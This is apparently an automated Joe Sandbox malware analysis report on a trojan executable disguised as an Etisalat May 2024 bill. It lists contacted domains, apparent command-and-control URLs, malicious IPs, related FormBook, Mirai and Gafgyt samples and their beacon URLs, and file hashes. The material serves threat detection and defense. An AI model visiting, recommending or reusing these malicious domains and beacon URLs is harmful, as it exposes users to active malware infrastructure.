          http://www.veriosg.xyz/da29/www.sercettopper.com | explorer.exe, 00000003.00000002.4440335006.0000000009BA7000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3096563167.0000000009BA4000.00000004.00000001.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
                                    http://www.flickzbiz.funReferer:explorer.exe, 00000003.00000002.4440335006.0000000009BA7000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3096563167.0000000009BA4000.00000004.00000001.00020000.00000000.sdmpfalse
                                    • Avira URL Cloud: safe
                                    unknown
                                    http://www.micheleditrana.com/da29/www.aerotyneholdings.comexplorer.exe, 00000003.00000002.4440335006.0000000009BA7000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3096563167.0000000009BA4000.00000004.00000001.00020000.00000000.sdmpfalse
                                    • Avira URL Cloud: safe
                                    unknown
                                    http://www.sercettopper.com/da29/explorer.exe, 00000003.00000002.4440335006.0000000009BA7000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3096563167.0000000009BA4000.00000004.00000001.00020000.00000000.sdmpfalse
                                    • Avira URL Cloud: safe
                                    unknown
                                    https://activity.windows.com/UserActivity.ReadWrite.CreatedByAppcrobat.exeexplorer.exe, 00000003.00000000.1996092451.000000000C4DC000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.4441907247.000000000C4DC000.00000004.00000001.00020000.00000000.sdmpfalse
                                    • URL Reputation: safe
                                    unknown
                                    http://www.usedata.monster/da29/www.vietcadao.comexplorer.exe, 00000003.00000002.4440335006.0000000009BA7000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3096563167.0000000009BA4000.00000004.00000001.00020000.00000000.sdmpfalse
                                    • Avira URL Cloud: safe
                                    unknown
                                    http://www.kas-travel.comReferer:explorer.exe, 00000003.00000002.4440335006.0000000009BA7000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3096563167.0000000009BA4000.00000004.00000001.00020000.00000000.sdmpfalse
                                    • Avira URL Cloud: safe
                                    unknown
                                    http://www.mediatechnologysolutions.comexplorer.exe, 00000003.00000002.4440335006.0000000009BA7000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3096563167.0000000009BA4000.00000004.00000001.00020000.00000000.sdmpfalse
                                    • Avira URL Cloud: safe
                                    unknown
                                    https://wns.windows.com/)sexplorer.exe, 00000003.00000002.4439803552.00000000099C0000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000000.1990524827.00000000099C0000.00000004.00000001.00020000.00000000.sdmpfalse
                                    • URL Reputation: safe
                                    unknown
                                    http://www.autoitscript.com/autoit3/Jexplorer.exe, 00000003.00000003.3096473322.000000000C85F000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000000.1997199712.000000000C861000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000000.1997199712.000000000C81C000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3096473322.000000000C861000.00000004.00000001.00020000.00000000.sdmpfalse
                                    • Avira URL Cloud: safe
                                    unknown
                                    http://www.veriosg.xyz/da29/explorer.exe, 00000003.00000002.4440335006.0000000009BA7000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3096563167.0000000009BA4000.00000004.00000001.00020000.00000000.sdmpfalse
                                    • Avira URL Cloud: safe
                                    unknown
                                    http://www.flickzbiz.fun/da29/www.openshiftstore.comexplorer.exe, 00000003.00000002.4440335006.0000000009BA7000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3096563167.0000000009BA4000.00000004.00000001.00020000.00000000.sdmpfalse
                                    • Avira URL Cloud: safe
                                    unknown
                                    http://www.myconc.pro/da29/www.flickzbiz.funexplorer.exe, 00000003.00000002.4440335006.0000000009BA7000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3096563167.0000000009BA4000.00000004.00000001.00020000.00000000.sdmpfalse
                                    • Avira URL Cloud: safe
                                    unknown
                                    http://www.aerotyneholdings.com/da29/www.1wxir.comexplorer.exe, 00000003.00000002.4440335006.0000000009BA7000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3096563167.0000000009BA4000.00000004.00000001.00020000.00000000.sdmpfalse
                                    • Avira URL Cloud: safe
                                    unknown
                                    http://www.micheleditrana.comexplorer.exe, 00000003.00000002.4440335006.0000000009BA7000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3096563167.0000000009BA4000.00000004.00000001.00020000.00000000.sdmpfalse
                                    • Avira URL Cloud: safe
                                    unknown
                                    http://www.rlyadventures.comexplorer.exe, 00000003.00000002.4440335006.0000000009BA7000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3096563167.0000000009BA4000.00000004.00000001.00020000.00000000.sdmpfalse
                                    • Avira URL Cloud: safe
                                    unknown
                                    http://www.cucinaconestilo.com/da29/eexplorer.exe, 00000003.00000002.4440335006.0000000009BA7000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3096563167.0000000009BA4000.00000004.00000001.00020000.00000000.sdmpfalse
                                    • Avira URL Cloud: safe
                                    unknown
                                    http://www.usedata.monsterReferer:explorer.exe, 00000003.00000002.4440335006.0000000009BA7000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3096563167.0000000009BA4000.00000004.00000001.00020000.00000000.sdmpfalse
                                    • Avira URL Cloud: safe
                                    unknown
                                    http://www.iransarafan.comexplorer.exe, 00000003.00000002.4440335006.0000000009BA7000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3096563167.0000000009BA4000.00000004.00000001.00020000.00000000.sdmpfalse
                                    • Avira URL Cloud: safe
                                    unknown
                                    http://www.1wxir.comReferer:explorer.exe, 00000003.00000002.4440335006.0000000009BA7000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3096563167.0000000009BA4000.00000004.00000001.00020000.00000000.sdmpfalse
                                    • Avira URL Cloud: safe
                                    unknown
                                    http://www.flickzbiz.funexplorer.exe, 00000003.00000002.4440335006.0000000009BA7000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3096563167.0000000009BA4000.00000004.00000001.00020000.00000000.sdmpfalse
                                    • Avira URL Cloud: safe
                                    unknown
                                    http://www.mediatechnologysolutions.comReferer:explorer.exe, 00000003.00000002.4440335006.0000000009BA7000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3096563167.0000000009BA4000.00000004.00000001.00020000.00000000.sdmpfalse
                                    • Avira URL Cloud: safe
                                    unknown
                                    http://www.rlyadventures.com/da29/www.myconc.proexplorer.exe, 00000003.00000002.4440335006.0000000009BA7000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3096563167.0000000009BA4000.00000004.00000001.00020000.00000000.sdmpfalse
                                    • Avira URL Cloud: safe
                                    unknown
                                    http://www.953700958.comReferer:explorer.exe, 00000003.00000002.4440335006.0000000009BA7000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3096563167.0000000009BA4000.00000004.00000001.00020000.00000000.sdmpfalse
                                    • Avira URL Cloud: safe
                                    unknown
                                    http://www.aerotyneholdings.comReferer:explorer.exe, 00000003.00000002.4440335006.0000000009BA7000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3096563167.0000000009BA4000.00000004.00000001.00020000.00000000.sdmpfalse
                                    • Avira URL Cloud: safe
                                    unknown
                                    https://outlook.comexplorer.exe, 00000003.00000002.4440413157.0000000009C96000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000000.1990524827.0000000009BAB000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3095738420.0000000009C92000.00000004.00000001.00020000.00000000.sdmpfalse
                                    • URL Reputation: safe
                                    unknown
                                    http://www.mediatechnologysolutions.com/da29/www.953700958.comexplorer.exe, 00000003.00000002.4440335006.0000000009BA7000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3096563167.0000000009BA4000.00000004.00000001.00020000.00000000.sdmpfalse
                                    • Avira URL Cloud: safe
                                    unknown
                                    http://www.myconc.proReferer:explorer.exe, 00000003.00000002.4440335006.0000000009BA7000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3096563167.0000000009BA4000.00000004.00000001.00020000.00000000.sdmpfalse
                                    • Avira URL Cloud: safe
                                    unknown
                                    http://www.veriosg.xyzexplorer.exe, 00000003.00000002.4440335006.0000000009BA7000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3096563167.0000000009BA4000.00000004.00000001.00020000.00000000.sdmpfalse
                                    • Avira URL Cloud: safe
                                    unknown
                                    http://www.kas-travel.com/da29/explorer.exe, 00000003.00000002.4440335006.0000000009BA7000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3096563167.0000000009BA4000.00000004.00000001.00020000.00000000.sdmpfalse
                                    • Avira URL Cloud: safe
                                    unknown
                                    http://www.iransarafan.com/da29/www.cucinaconestilo.comexplorer.exe, 00000003.00000002.4440335006.0000000009BA7000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3096563167.0000000009BA4000.00000004.00000001.00020000.00000000.sdmpfalse
                                    • Avira URL Cloud: safe
                                    unknown
                                    http://www.953700958.comexplorer.exe, 00000003.00000002.4440335006.0000000009BA7000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3096563167.0000000009BA4000.00000004.00000001.00020000.00000000.sdmpfalse
                                    • Avira URL Cloud: safe
                                    unknown
                                    http://www.rlyadventures.comReferer:explorer.exe, 00000003.00000002.4440335006.0000000009BA7000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3096563167.0000000009BA4000.00000004.00000001.00020000.00000000.sdmpfalse
                                    • Avira URL Cloud: safe
                                    unknown
                                    https://android.notify.windows.com/iOSexplorer.exe, 00000003.00000000.1987574509.00000000076F8000.00000004.00000001.00020000.00000000.sdmpfalse
                                    • URL Reputation: safe
                                    unknown
                                    http://www.iransarafan.com/da29/explorer.exe, 00000003.00000002.4440335006.0000000009BA7000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3096563167.0000000009BA4000.00000004.00000001.00020000.00000000.sdmpfalse
                                    • Avira URL Cloud: safe
                                    unknown
                                    http://www.openshiftstore.com/da29/www.veriosg.xyzexplorer.exe, 00000003.00000002.4440335006.0000000009BA7000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3096563167.0000000009BA4000.00000004.00000001.00020000.00000000.sdmpfalse
                                    • Avira URL Cloud: safe
                                    unknown
                                    http://www.sercettopper.com/da29/www.kas-travel.comexplorer.exe, 00000003.00000002.4440335006.0000000009BA7000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3096563167.0000000009BA4000.00000004.00000001.00020000.00000000.sdmpfalse
                                    • Avira URL Cloud: safe
                                    unknown
                                    http://www.micheleditrana.comReferer:explorer.exe, 00000003.00000002.4440335006.0000000009BA7000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3096563167.0000000009BA4000.00000004.00000001.00020000.00000000.sdmpfalse
                                    • Avira URL Cloud: safe
                                    unknown
                                    http://www.aerotyneholdings.comexplorer.exe, 00000003.00000002.4440335006.0000000009BA7000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3096563167.0000000009BA4000.00000004.00000001.00020000.00000000.sdmpfalse
                                    • Avira URL Cloud: safe
                                    unknown
                                    http://www.sercettopper.comexplorer.exe, 00000003.00000002.4440335006.0000000009BA7000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3096563167.0000000009BA4000.00000004.00000001.00020000.00000000.sdmpfalse
                                    • Avira URL Cloud: safe
                                    unknown
                                    https://api.msn.com/explorer.exe, 00000003.00000000.1990524827.0000000009ADB000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.4439803552.0000000009ADB000.00000004.00000001.00020000.00000000.sdmpfalse
                                    • URL Reputation: safe
                                    unknown
                                    http://www.veriosg.xyzReferer:explorer.exe, 00000003.00000002.4440335006.0000000009BA7000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3096563167.0000000009BA4000.00000004.00000001.00020000.00000000.sdmpfalse
                                    • Avira URL Cloud: safe
                                    unknown
                                    http://crl.vexplorer.exe, 00000003.00000002.4435480864.0000000000F13000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000003.00000000.1984137614.0000000000F13000.00000004.00000020.00020000.00000000.sdmpfalse
                                    • URL Reputation: safe
                                    unknown
                                    http://www.cucinaconestilo.comexplorer.exe, 00000003.00000002.4440335006.0000000009BA7000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3096563167.0000000009BA4000.00000004.00000001.00020000.00000000.sdmpfalse
                                    • Avira URL Cloud: safe
                                    unknown
                                    http://www.openshiftstore.comexplorer.exe, 00000003.00000002.4440335006.0000000009BA7000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3096563167.0000000009BA4000.00000004.00000001.00020000.00000000.sdmpfalse
                                    • Avira URL Cloud: safe
                                    unknown
                                    • No. of IPs < 25%
                                    • 25% < No. of IPs < 50%
                                    • 50% < No. of IPs < 75%
                                    • 75% < No. of IPs
                                    IPDomainCountryFlagASNASN NameMalicious
                                    103.224.212.212
                                    www.vietcadao.comAustralia
                                    133618TRELLIAN-AS-APTrellianPtyLimitedAUtrue
                                    13.248.169.48
                                    www.aerotyneholdings.comUnited States
                                    16509AMAZON-02UStrue
                                    190.115.24.78
                                    www.1wxir.comBelize
                                    262254DDOS-GUARDCORPBZtrue
                                    76.223.105.230
                                    micheleditrana.comUnited States
                                    16509AMAZON-02UStrue
                                    169.239.128.46
                                    www.myconc.proSeychelles
                                    61138ZAPPIE-HOST-ASZappieHostGBtrue
Joe Sandbox version: 40.0.0 Tourmaline
Analysis ID: 1448570
Start date and time: 2024-05-28 15:07:04 +02:00
Joe Sandbox product: CloudBasic
Overall analysis duration: 0h 11m 2s
Hypervisor based Inspection enabled: false
Report type: full
Cookbook file name: default.jbs
Analysis system description: Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of new started processes analysed: 9
Number of new started drivers analysed: 0
Number of existing processes analysed: 0
Number of existing drivers analysed: 0
Number of injected processes analysed: 1
Technologies:
• HCA enabled
• EGA enabled
• AMSI enabled
Analysis Mode: default
Sample name: Details of Your Etisalat Summary Bill for the Month of May 2024.exe
Detection: MAL
Classification: mal100.troj.evad.winEXE@8/4@11/5
EGA Information:
• Successful, ratio: 100%
HCA Information:
• Successful, ratio: 100%
• Number of executed functions: 60
• Number of non-executed functions: 270
Cookbook Comments:
• Found application associated with file extension: .exe
• Override analysis time to 240000 for current running targets taking high CPU consumption
• Exclude process from analysis (whitelisted): dllhost.exe, WMIADAP.exe, SIHClient.exe, svchost.exe
• Excluded domains from analysis (whitelisted): ocsp.digicert.com, slscr.update.microsoft.com, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
• Not all processes were analyzed; the report is missing behavior information
• Report creation exceeded the maximum time and may be missing disassembly code information
• Report size exceeded maximum capacity and may be missing disassembly code
• Report size getting too big: too many NtEnumerateKey calls found
• Report size getting too big: too many NtOpenKey calls found
• Report size getting too big: too many NtOpenKeyEx calls found
• Report size getting too big: too many NtQueryValueKey calls found
• VT rate limit hit for: Details of Your Etisalat Summary Bill for the Month of May 2024.exe
Time      Type              Description
09:08:00  API Interceptor   8090958x Sleep call for process: explorer.exe modified
09:08:32  API Interceptor   7362146x Sleep call for process: cmstp.exe modified
                                    MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                    103.224.212.212jqPZZhDmjh.exeGet hashmaliciousFormBookBrowse
                                    • www.theanhedonia.com/gy14/?Szu8Zp=sJB9xXDMLUearYsOJfMPyoOL09k0Ht7qJDXT7N+Z0c0oohLZUl68J6Fs60bzmHjgtnYtuzz0MQ==&3fzlqX=DtjxV
                                    z2______________________________.exeGet hashmaliciousFormBookBrowse
                                    • www.theanhedonia.com/gy14/?MRmX=sJB9xXC4L0bq2ox6VvMPyoOL09k0Ht7qJDXT7N+Z0c0oohLZUl68J6Fs633JlGPbuQ58&J61h=CBZhCFnx-
                                    file.exeGet hashmaliciousLummaC, Glupteba, PureLog Stealer, RisePro Stealer, SmokeLoader, Stealc, zgRATBrowse
                                    • soclaiebn.xyz/PhpMyAdmin/
                                    22#U0415.exeGet hashmaliciousFormBookBrowse
                                    • www.theanhedonia.com/gy14/?8pB8=qN98lNP8T4bXSv70&NBZlJ=sJB9xXC4L0bq2ox6VvMPyoOL09k0Ht7qJDXT7N+Z0c0oohLZUl68J6Fs633JlGPbuQ58
                                    RFQ-T56797W_1.xlsxGet hashmaliciousFormBook, NSISDropperBrowse
                                    • www.narrativepages.com/ge06/?6l58L2=/ya+08xkyOEL3z3mbFI+CcZs6Ll5ZIz+eS70dlN8tW9HOdaiVOhFBqrIR4wo06Sw4yKSnA==&BL3=KP-PB41
                                    GCeHcfCef8.exeGet hashmaliciousFormBookBrowse
                                    • www.fhstbanknigeria.com/rs10/?s0=3hcrZOpg0bcnkhh15AgNBYOBAaFzA2w39b7OLOTzLX17gT7vmmZNER029cGGSq2teP1k&CB_=7nEpdJs
                                    Audit_Confirmation_pdf.exeGet hashmaliciousFormBookBrowse
                                    • www.brynnwpods.com/ls02/?U2MTG=IjLtFX-X1ru86jf&rrn=BOXRJAyFp7ak5hNUAxrCPIqjpri6yIqDhPKfVNEe46v/rpGYXPOMCZCFlinyM3iKXNZy
                                    SWIFT_LETTER_A1OzGLOB0NH2.exeGet hashmaliciousFormBookBrowse
                                    • www.brynnwpods.com/ls02/?GxoHR=VBjPa4VPhFxDNPj&_ZApkb=BOXRJAyFp7ak5hNUAxrCPIqjpri6yIqDhPKfVNEe46v/rpGYXPOMCZCFlhHtHXyyNqk4
                                    13.248.169.48VSL_BUNKER INQUIRY.exeGet hashmaliciousFormBookBrowse
                                    • www.supermontage.com/9i8t/?4PB=2T5+pGPdigXxZZx8gY/OSLODLjvvwj0MjlV7S+1Ldbgia1Gm71jO+3C1ccfYbIwVvCUgnk/aeboESokRLTli2QWqQuYbgw8p6Q8aB1I7ivKjFloRg7F5nUdQ3eKMHcuV8w==&wdZh=n2Ih08C05RZDa
                                    PDF89gh ReUrgent Quotepdf.exeGet hashmaliciousFormBookBrowse
                                    • www.getjobspie.com/aika/
                                    USD46k Swift_PDF.exeGet hashmaliciousFormBookBrowse
                                    • www.oreh.net/even/
                                    PAYMENT COPY.exeGet hashmaliciousFormBookBrowse
                                    • www.supermontage.com/9i8t/?VlEHDVvh=2T5+pGPdigXxZZx8gY/OSLODLjvvwj0MjlV7S+1Ldbgia1Gm71jO+3C1ccfYbIwVvCUgnk/aeboESokRLTli2QWqQswZxn4Hxw0zC18njeajG3czp+Bsx3U=&BHPD=o2nt
                                    USD46k Swift_PDF.exeGet hashmaliciousFormBookBrowse
                                    • www.oreh.net/even/
                                    w5c8CHID77.exeGet hashmaliciousUnknownBrowse
                                    • crovace.com/images/1/filenames.php
                                    http://domclickext.xyzGet hashmaliciousUnknownBrowse
                                    • domclickext.xyz/lander
                                    P240842_P240843.exeGet hashmaliciousFormBook, PureLog StealerBrowse
                                    • www.5redbull.com/ht3d/?_Td4vT=ZL3P5PGPdr&LjqdxdN0=ySrzTuqbYiyLAwBY6em+9ZmTsohlgC2Wb5uHAaPcVSTcIXHVq5qBaAngv1HA17NCZbzO
                                    narud#U017ebenicu 018BH2024.exeGet hashmaliciousFormBookBrowse
                                    • www.playtoown.shop/dd20/?FRcPAJY=z+kmDmqXOSaonEhRZs5Wl2PzvdAdpd9CMMNx8+wPdH51C9fUA+EkzIY35EvCfc9TN9UxgbNWJQ==&KXiD2=yvwhLLV07x4hUne0
                                    8VRN7Hjoig.exeGet hashmaliciousFormBook, PureLog StealerBrowse
                                    • www.nativegarden.net/ht3d/?9r4P2=wUVaOlJZblJdDdMRjLfemxLLWBRd24us117/s2Iam/T8vs3Es0GOt4bvK3USgri2KA/F&wDH=FtxdAxlh54YtUPG0
                                    190.115.24.78Statement_PDF.exeGet hashmaliciousFormBook, NSISDropperBrowse
                                    • www.1wapws.top/sn26/?wj=uSlEae22kwIZ4e+ajloGly+itIksrwkKYVWDVDlJ2AhkB4ElKTghaBOhlImS+3+X/WGG&BvI=CR-pfvw0B
                                    bank_transfer_form_pdf.exeGet hashmaliciousFormBook, NSISDropperBrowse
                                    • www.1wapws.top/sn26/?r0=Z0G8Tj7hq8g&JB4TTn=uSlEae22kwIZ4e+ajloGly+itIksrwkKYVWDVDlJ2AhkB4ElKTghaBOhlLSC72esnmnB
                                    DHL_Shipment_Delivery_Notification_27-9-23.exeGet hashmaliciousFormBook, NSISDropperBrowse
                                    • www.1wapws.top/sn26/?1b6txjN=uSlEae3H4HJplenl/VoGly+itIksrwkKYVWDVDlJ2AhkB4ElKTghaBOhlLGCxWuvhzvB&jL3Tdr=PPJHaZ6XBzapN20p
                                    Invoice#23615B001.exeGet hashmaliciousFormBookBrowse
                                    • www.1wapws.top/sn26/?jBZ=uSlEae3H4HJplenl/VoGly+itIksrwkKYVWDVDlJ2AhkB4ElKTghaBOhlLGoumevlxnB&pXQ=LJE0lvk
                                    PO._4300000894.exeGet hashmaliciousFormBook, NSISDropperBrowse
                                    • www.1wapws.top/sn26/?uZXp=uSlEae3H4HJplenl/VoGly+itIksrwkKYVWDVDlJ2AhkB4ElKTghaBOhlLGoumevlxnB&-ZSX=1bxhU
                                    RFQ_8_10_23.exeGet hashmaliciousFormBook, NSISDropperBrowse
                                    • www.1wapws.top/sn26/?0JELpJ=uSlEae3H4HJplenl/VoGly+itIksrwkKYVWDVDlJ2AhkB4ElKTghaBOhlIqStnyUmGGQmHWxMQ==&OJ=Fxoh2R
                                    Ultratech_Alfa_PO_NO.333.exeGet hashmaliciousFormBook, NSISDropperBrowse
                                    • www.1wapws.top/sn26/?CXuDt=uSlEae3H4HJplenl/VoGly+itIksrwkKYVWDVDlJ2AhkB4ElKTghaBOhlIqryWSXoQaXmHW2fg==&6lUt=_2JtWRe8sn9ly
                                    Urgent_Quote.exeGet hashmaliciousFormBookBrowse
                                    • www.1wigun.top/sz94/?UJExkx=X61TKVA8&FR-=uah20gjjpO+yZ/kp2IAhE+NlvmbDpCCBgWyea6RoIR6R5In/8BJ4jCO+QZ925yDhuMvc
                                    z78DHL_CBJ42723152429.exeGet hashmaliciousFormBookBrowse
                                    • www.1wigun.top/sz94/?4hbhG=uah20gjjpO+yZ/kp2IAhE+NlvmbDpCCBgWyea6RoIR6R5In/8BJ4jCO+QZ925yDhuMvc&lVw8Wr=5jfX5pvhQlD02X
                                    TR0zWyH8jZ.exeGet hashmaliciousFormBookBrowse
                                    • www.1wwuwa.top/ar73/?3fQL-lV=EH+nVsadtG5aeyVqEId+KgpfEVrvId6rromTbWOVT9T57CBJlhL0gNVFpxB1ors5KLET&E0D=b8eXzTW0EphdPr
                                    No context
                                     Match | Associated Sample Name / URL | Detection | Threat Name | Context
                                     Match: DDOS-GUARDCORP (BZ)
                                     https://rechrgerte.sbs/ | malicious | Unknown
                                     • 186.2.171.38
                                     https://rechrgerte.xyz/ | malicious | Unknown
                                     • 186.2.171.38
                                     https://rechrgerte.shop/ | malicious | Unknown
                                     • 186.2.171.38
                                     https://appehmrahem.bond/ | malicious | Unknown
                                     • 186.2.171.38
                                     http://tredildlngviw.icu/ | malicious | Unknown
                                     • 186.2.171.38
                                     https://tredildlngviw.shop/ | malicious | Unknown
                                     • 186.2.171.38
                                     https://tredildlngviw.sbs/ | malicious | Unknown
                                     • 186.2.171.38
                                     https://du-ae.lol/ | malicious | Unknown
                                     • 186.2.171.38
                                     https://du-ae.shop/ | malicious | Unknown
                                     • 186.2.171.38
                                     https://durecharga.monster/ | malicious | Unknown
                                     • 186.2.171.38
                                     Match: TRELLIAN-AS-AP Trellian Pty Limited (AU)
                                     file.exe | malicious | CMSBrute
                                     • 103.224.212.214
                                     HELP_DECRYPT.HTML | malicious | Unknown
                                     • 103.224.212.237
                                     SlHgSOYcMY.exe | malicious | Unknown
                                     • 103.224.212.34
                                     Erzsébet - árajánlat kérése.xlsm | malicious | FormBook
                                     • 103.224.212.214
                                     Swift Copy.exe | malicious | FormBook, PureLog Stealer
                                     • 103.224.212.217
                                     0rVlyonS3R.exe | malicious | FormBook, PureLog Stealer
                                     • 103.224.182.246
                                     https://upsmychoicedeals.com | malicious | Unknown
                                     • 103.224.212.216
                                     xQAP5P41U8DI.exe | malicious | Remcos
                                     • 103.224.182.242
                                     http://free.filesearch.club/?q=grade+9+core+french+textbook | malicious | Unknown
                                     • 103.224.212.217
                                     http://learningstudio.ai | malicious | Unknown
                                     • 103.224.182.210
                                     Match: AMAZON-02 (US)
                                     arm7.nn.elf | malicious | Mirai
                                     • 35.176.26.28
                                     mpl.nn.elf | malicious | Mirai
                                     • 108.158.165.21
                                     x64.nn.elf | malicious | Mirai
                                     • 18.146.134.155
                                     x86.nn.elf | malicious | Mirai
                                     • 44.227.45.146
                                     Quarantined Messages.zip | malicious | Unknown
                                     • 99.84.9.27
                                     EZPrs0LSHV.elf | malicious | Mirai
                                     • 54.97.170.240
                                     Arcadia Aerospace Industries (AAI) - ILSMart - RFQ4567987654.html | malicious | Unknown
                                     • 13.32.99.33
                                     https://ifewn.mpbolic.com/L6HiIOM/#Bfun@fun.com | malicious | HTMLPhisher
                                     • 18.245.31.33
                                     qqyt33.arm6.elf | malicious | Gafgyt, Mirai
                                     • 54.171.230.55
                                     skt.arm4.elf | malicious | Mirai
                                     • 13.250.89.134
                                     Match: ZAPPIE-HOST-AS Zappie Host (GB)
                                     t8WeXq3mvS.elf | malicious | Gafgyt
                                     • 185.99.133.18
                                     FpKoJ3MLci.elf | malicious | Gafgyt
                                     • 185.99.133.5
                                     7eerH6chN6.elf | malicious | Gafgyt
                                     • 185.99.133.34
                                     Caa2tySjUN.elf | malicious | Gafgyt
                                     • 185.99.133.34
                                     6bQ8PT9ViT.elf | malicious | Unknown
                                     • 185.99.133.18
                                     Fk8heO9U1J.elf | malicious | Gafgyt
                                     • 185.99.133.173
                                     yx3S8wYEkK.elf | malicious | Mirai, Gafgyt
                                     • 169.239.146.21
                                     o7EitOEfWr.elf | malicious | Unknown
                                     • 169.239.146.21
                                     SecuriteInfo.com.Win32.Trojan.CobaltStrike.4EYNH5.5772.17622.dll | malicious | CobaltStrike
                                     • 169.239.128.124
                                     Z27kR5FZtq.elf | malicious | Mirai
                                     • 169.239.146.33
                                     Match: AMAZON-02 (US)
                                     arm7.nn.elf | malicious | Mirai
                                     • 35.176.26.28
                                     mpl.nn.elf | malicious | Mirai
                                     • 108.158.165.21
                                     x64.nn.elf | malicious | Mirai
                                     • 18.146.134.155
                                     x86.nn.elf | malicious | Mirai
                                     • 44.227.45.146
                                     Quarantined Messages.zip | malicious | Unknown
                                     • 99.84.9.27
                                     EZPrs0LSHV.elf | malicious | Mirai
                                     • 54.97.170.240
                                     Arcadia Aerospace Industries (AAI) - ILSMart - RFQ4567987654.html | malicious | Unknown
                                     • 13.32.99.33
                                     https://ifewn.mpbolic.com/L6HiIOM/#Bfun@fun.com | malicious | HTMLPhisher
                                     • 18.245.31.33
                                     qqyt33.arm6.elf | malicious | Gafgyt, Mirai
                                     • 54.171.230.55
                                     skt.arm4.elf | malicious | Mirai
                                     • 13.250.89.134
                                    No context
                                    No context
                                    Process:C:\Users\user\Desktop\Details of Your Etisalat Summary Bill for the Month of May 2024.exe
                                    File Type:data
                                    Category:dropped
                                    Size (bytes):175938
                                    Entropy (8bit):7.978966402215972
                                    Encrypted:false
                                    SSDEEP:3072:jY2p0TprjqDr8orc3STC3lP+NuEWUy1HZ+BJUtCYNe6iNC1Ybv0jGRHoqFDjL:82qFjq/8ooSTqhEfaNHEqoRHoib
                                    MD5:0B5BB209E95764A71CFB0CA36A95E181
                                    SHA1:B5767757AF322633334CFBFF6292F80A2135C1F9
                                    SHA-256:F48AE8FEE926B2236AD1E43AB1CE82ECFDADA241F2FB0311DCD3501D88A881F8
                                    SHA-512:FAEED7625ECEC33E520BC296618174910370652AB2FEB7058120D0B2AE96E4F79A45C00C7DBC85DACA4C2706F7CB3D8F30EB37A191A9E06820736B1958D2C482
                                    Malicious:false
                                    Reputation:low
